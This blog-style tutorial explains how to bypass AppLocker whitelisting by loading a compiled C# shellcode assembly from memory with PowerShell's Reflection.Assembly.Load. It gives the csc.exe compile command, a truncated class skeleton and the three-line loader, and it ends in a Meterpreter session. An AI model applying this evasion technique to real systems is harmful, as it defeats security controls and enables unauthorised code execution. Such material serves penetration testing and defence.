It is possible in an environment that AppLocker is enabled to run an executable due to the way that assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and it was presented in ShmooCon 2015. The Assembly Load method is able to call a file from three different locations:

  • Memory // Byte[]
  • Location on the disk
  • From a URL

The .NET assembly originally is loaded with Read permissions in order to enumerate the methods and properties associated with the binary and then permissions are changed to Execute so AppLocker or any whitelisting application cannot identify that something was executed on the system.

Bypassing AppLocker with this method consists of three steps:

  • Generate C# ShellCode
  • Compile the .NET application
  • Execute ShellCode from Memory with Assembly Load

Metasploit MSFvenom can be used to generate C# shellcode:

C# Shellcode

C# Shellcode Generation

The Shellcode above can be injected into the C# file which then can be compiled by the csc utility which is part of the .NET framework in order to generate the executable.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /unsafe /platform:x86 /out:shellcode.exe shellcode.cs
Compiling C# Code to Executable

Compiling C# Code to Executable

Running the executable directly or from Powershell will fail since this binary is not whitelisted with an AppLocker rule.

AppLocker Rule - Block Executables

AppLocker Rule – Block Executables

AppLocker Rule - Block ShellCode Binary

AppLocker Rule – Block ShellCode Binary

However it is possible to bypass this restriction by using the loading assembly method in PowerShell in order to execute the ShellCode which is inside the file and it is defined as a method directly from memory.

public class Shellcode
{
public static void Exec()
{
// native function's compiled code
byte[] shellcode = new byte[354] {

The following needs to be executed from PowerShell:

$bytes = [System.IO.File]::ReadAllBytes(“C:\shellcode.exe")
[Reflection.Assembly]::Load($bytes)
[Shellcode]::Exec()
Assembly Load

Assembly Load

The shellcode will be executed and a Meterpreter session will open.

Meterpreter - ShellCode

Meterpreter – Shellcode

Resources

https://github.com/subTee/ShmooCon-2015

Advertisements